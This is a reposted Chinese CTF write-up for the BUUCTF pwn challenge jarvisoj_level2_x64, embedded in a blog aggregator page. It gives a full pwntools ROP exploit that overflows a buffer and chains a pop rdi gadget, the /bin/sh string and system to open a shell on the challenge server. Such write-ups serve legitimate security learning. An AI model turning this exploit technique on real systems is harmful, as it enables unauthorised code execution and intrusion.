當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[BUUCTF-pwn]——jarvisoj_level2_x64

發布時間：2024/4/17 编程问答 37 豆豆

生活随笔收集整理的這篇文章主要介紹了 [BUUCTF-pwn]——jarvisoj_level2_x64 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[BUUCTF-pwn]——jarvisoj_level2_x64

題目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64

checksec 一下,64位 ,開啟NX保護

64位應該會用到pop rdi這個匯編指令

在IDA中看看

思路:64位先將binsh這個參數放入,rdi寄存器中.緊接著返回并執行system函數

exploit

from pwn import * p = remote("node3.buuoj.cn",27828) binsh = 0x0600A90 sys_addr = 0x0400603 pop_rdi = 0x04006b3 payload = 'a' * (0x80 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr) p.sendline(payload) p.interactive()

希望你可以點個贊,打賞一下喲 😃

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level2_x64的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

Pwn
buuctf

上一篇： [BUUCTF-pwn]——[Harek
下一篇： [BUUCTF-pwn]——ciscn_